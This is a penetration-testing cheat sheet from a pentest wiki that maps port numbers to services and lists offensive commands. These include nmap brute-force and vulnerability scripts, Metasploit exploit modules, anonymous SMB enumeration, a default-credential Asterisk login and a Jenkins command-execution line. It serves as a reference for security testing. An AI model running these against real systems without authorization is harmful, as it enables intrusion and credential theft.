Ports

Port Number Protocol Service & Application Commands
1 tcp blackice
7 tcp echo
11 tcp systat
13 tcp daytime
15 tcp netstat
17 tcp quote of the day
19 tcp character generator
21 tcp ftp nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 IP
22 tcp ssh msf > use auxiliary/scanner/ssh/ssh_login
nmap --script ssh2-enum-algos 192.168.108.197
nmap --script ssh-hostkey IP
nmap --script sshv1 192.168.108.197
23 tcp telnet msf > use auxiliary/scanner/telnet/telnet_login
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s IP
nmap -p 23 --script telnet-encryption IP
nmap -p 23 --script telnet-ntlm-info IP
25 tcp smtp nmap -p 25 --script smtp-brute IP
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=domain] -pT:25,465,587 IP
nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com IP
nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=domain,smtp-open-relay.ip=address,...] -p 25,465,587 IP
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=domain' -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 IP
26 tcp ssh
37 tcp rdate
49 tcp TACACS+
53 tcp dns
53 udp dns
67 tcp DHCP
68 tcp dhclient
69 udp TFTP,BitTorrent
70 tcp Gopher
79 tcp Finger
80 tcp HTTP,malware
81 tcp HTTP,malware
82 tcp HTTP,malware
83 tcp HTTP
84 tcp HTTP
88 tcp Kerberos msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
102 tcp Siemens S7
110 tcp pop3
111 tcp RPC rpcinfo -p 192.168.1.111
msf >use auxiliary/scanner/nfs/nfsmount
Nfspy
119 tcp NNTP
123 tcp NTP
123 udp ntp ntpdc -n -c monlist IP
nmap -sU -p 123 -Pn -n --script ntp-info IP
nmap -sU -p 123 -Pn -n --script ntp-monlist IP
msf > use auxiliary/scanner/ntp/ntp_readvar
137 tcp NetBIOS nbtscan -A IP
139 tcp SMB enum4linux -a IP
rpcclient -U "" IP + srvinfo; enumdomusers; getdompwinfo; querydominfo; netshareenum; netshareenumall
143 tcp IMAP
161 udp snmp snmpcheck -p 161 -c public -t IP
snmpwalk -v1 -c public IP
msf > use auxiliary/scanner/snmp/snmp_enum
162 udp snmp
175 tcp IBM Network Job Entry
179 tcp BGP
195 tcp TA14-353a
264 Checkpoint Firewall
311 tcp OS X Server Manager
389 tcp ldap ldap://IP/dc=com
443 tcp https openssl s_client -host ADDR -port 443
sslscan ADDR
tlssled ADDR 443
nmap --script sslv2 ADDR
nmap --script ssl-cert ADDR
nmap --script ssl-date ADDR
nmap --script ssl-enum-ciphers ADDR
nmap --script ssl-google-cert-catalog ADDR
msf > use auxiliary/pro/web_ssl_scan
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf > use auxiliary/server/openssl_heartbeat_client_memory
445 tcp Microsoft-DS Active Directory, Windows shares
Microsoft-DS SMB file sharing
smbclient -U root -L IP
smbclient -U root //IP/tmp
rpcclient -U "" IP
msf > auxiliary/admin/smb/samba_symlink_traversal
465 tcp smtps
500 udp ike
502 tcp modbus
503 tcp modbus
512 tcp
513 tcp
514 tcp
515 tcp Line Printer Daemon
520 tcp RIP
523 tcp IBM DB2
554 tcp RTSP
587 tcp SMTP mail submission
623 tcp IPMI
626 tcp OS X serialnumberd
631 tcp CUPS Service error
636 tcp ldaps
771 tcp Realport
789 tcp Redlion Crimson3
873 tcp rsync rsync -a user@host::tools/
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' IP
nmap -p 873 --script rsync-list-modules IP
msf >use auxiliary/scanner/rsync/modules_list
902 tcp VMware authentication
953 BIND Control Port
992 tcp Telnet(secure)
993 tcp IMAPs
995 tcp POP3s
1023 tcp telnet
1025 tcp Kamstrup
1030 tcp RPC
1032 tcp RPC
1033 tcp RPC
1038 tcp RPC
1099 tcp Remote Method Invocation msf > use exploit/multi/misc/java_rmi_server
1194 tcp openvpn
1200 tcp Codesys
1234 udp udpxy
1202 tcp linknat
1433 tcp MS-SQL MSF>use auxiliary/scanner/mssql/mssql_ping
1434 udp MS-SQL monitor
1521 tcp Oracle tnscmd10g version/status -h IP
1604 Citrix, malware
1723 tcp pptp thc-pptp-bruter -v -u username -n 4 IP < pass.txt
1741 CiscoWorks
1833 MQTT
1900 tcp bes,UPnP
1911 Niagara Fox
1962 PCworx
2000 iKettle,MikroTik bandwidth test
2049 tcp nfs showmount --all IP
showmount --exports IP
mount -t nfs IP:/ /mnt/nfs/
Nfspy
2082 tcp cpanel
2083 tcp cpanel
2086 WHM
2087 WHM
2100 tcp Oracle XML DB Default Username/Passwords
2121 tcp ftp msf > use auxiliary/scanner/ftp/ftp_login
2123 GTPv1
2152 GTPv1
2182 Apache Zookeeper
2222 tcp SSH, PLC5, EtherNet/IP
2323 tcp telnet
2332 tcp Sierra wireless(telnet)
2375 Docker
2376 Docker
2404 IEC-104
2455 CoDeSys
2480 OrientDB
2628 Dictionary
2967 Symantec System Center Alert Management System
3000 ntop
3128 tcp squid
3299 tcp sap msf > use auxiliary/scanner/sap/sap_router_portscanner
3306 tcp mysql msf > auxiliary/scanner/mysql/mysql_login
nmap --script mysql-brute IP
nmap --script mysql-databases IP
nmap -p 3306 --script mysql-dump-hashes --script-args='username=username,password=password' IP
nmap -p 3306 --script mysql-enum IP
nmap -p 3306 --script mysql-users IP
nmap -p 3306 --script mysql-query --script-args='query="query"[,username=username,password=password]' IP
3310 tcp ClamAV
3339 Oracle Web Interface
3386 GTPv1
3388 RDP
3389 RDP rdesktop -u guest -p guest IP -g 94%
rdp-sec-check IP
3541 PBX GUI
3542 PBX GUI
3632 tcp distccd msf > use exploit/unix/misc/distcc_exec
3689 DACP
3780 Metasploit
3787 Ventrilo
4022 udpxy
4369 tcp Erlang Port Mapper Daemon nmap -p 4369 --script epmd-info IP
4440 tcp rundeck
4500 IKE NAT-T(VPN)
4567 Modem web interface
4070 VertX/Edge door controller
4800 Moxa Nport
4911 Niagara Fox with SSL
4949 Munin
5006 MELSEC-Q
5007 MELSEC-Q
5008 NetMobility
5009 Apple Airport Administrator
5038 tcp Asterisk Call Manager http://code.google.com/p/sipvicious/

$ ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted
action: command
command: core show help
5432 tcp postgresql
5060 udp sip msf > use auxiliary/scanner/sip/options
5222 XMPP
5269 XMPP Server to Server
5353 mDNS
5357 Microsoft-HTTP API/2.0
5432 Postgresql
5555 tcp hp data protector msf > use exploit/windows/misc/hp_dataprotector_cmd_exec
5577 Flux LED
5601 tcp kibana
5632 PCAnywhere
5672 RabbitMQ
5900 tcp vnc msf > use auxiliary/scanner/vnc/vnc_none_auth
msf > use auxiliary/scanner/vnc/vnc_login
msf > use exploit/multi/vnc/vnc_keyboard_exec
nmap --script vnc-brute -p 5900 IP
nmap --script vnc-info -p 5900 IP
5901 vnc
5938 TeamViewer
5984 CouchDB
5985 tcp winrm msf >use exploit/windows/winrm/winrm_script_exec
msf >use auxiliary/scanner/winrm/winrm_auth_methods
msf >use auxiliary/scanner/winrm/winrm_cmd
msf >use auxiliary/scanner/winrm/winrm_login
msf >use auxiliary/scanner/winrm/winrm_wql
6000 tcp x11 xwd -root -screen -silent -display 192.168.1.108:0 > out.xwd
convert out.xwd out.png
6379 tcp redis redis-cli -h 127.0.0.1 -p 6379
msf >use auxiliary/scanner/redis/file_upload
msf >use auxiliary/scanner/redis/redis_login
msf >use auxiliary/scanner/redis/redis_server
6380 tcp redis
6082 tcp varnish
6667 tcp ircd backdoor msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
6881 BitTorrent
6969 TFTP,BitTorrent
7001 tcp weblogic
8080 tcp jenkins Jenkins Console
println "cmd.exe /c dir".execute().text

msf >use auxiliary/scanner/http/jenkins_enum
msf >use exploit/multi/http/jenkins_script_console
8083 tcp vestacp
8089 tcp jboss
8101 tcp apache karaf
8180 tcp apache tomcat msf > use exploit/multi/http/tomcat_mgr_deploy
8443 tcp https
8443 Symantec SEP Manager
8554 tcp rtsp
8649 tcp ganglia
9009 tcp Julia
9043 tcp WebSphere
9090 Symantec SEP Manager
9151 tcp Tor Control
9160 Apache Cassandra
9200 tcp elasticsearch msf >use exploit/multi/elasticsearch/search_groovy_script
9418 tcp git
10000 tcp virtualmin/webmin
11211 tcp memcache
12174 tcp Symantec System Center Alert Management System
13579 Media Player classic web interface
17185 VxWorks WDBRPC
18083 tcp vbox server
27017 tcp mongodb msf >use auxiliary/scanner/mongodb/mongodb_login
$ mongo host:port/database
MongoDB shell version: 2.6.12
> help
28017 tcp mongodb
37777 Dahua DVR
38292 Symantec System Center Alert Management System
44818 EtherNet/IP
49153 WeMo Link
50000 tcp sap
50030 tcp hadoop
50070 tcp hadoop
51106 Deluge(HTTP)
54138 Toshiba PoS
55553 Metasploit
55554 Metasploit
62078 Apple iDevice
64738 Mumble

Links

  1. http://www.rfc-editor.org/search/rfc_search.php
  2. http://packetlife.net/
  3. https://www.leanpub.com/shodan

Originally taken from: https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md

The MIT License (MIT)

Copyright (c) 2016 Vex Woo

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.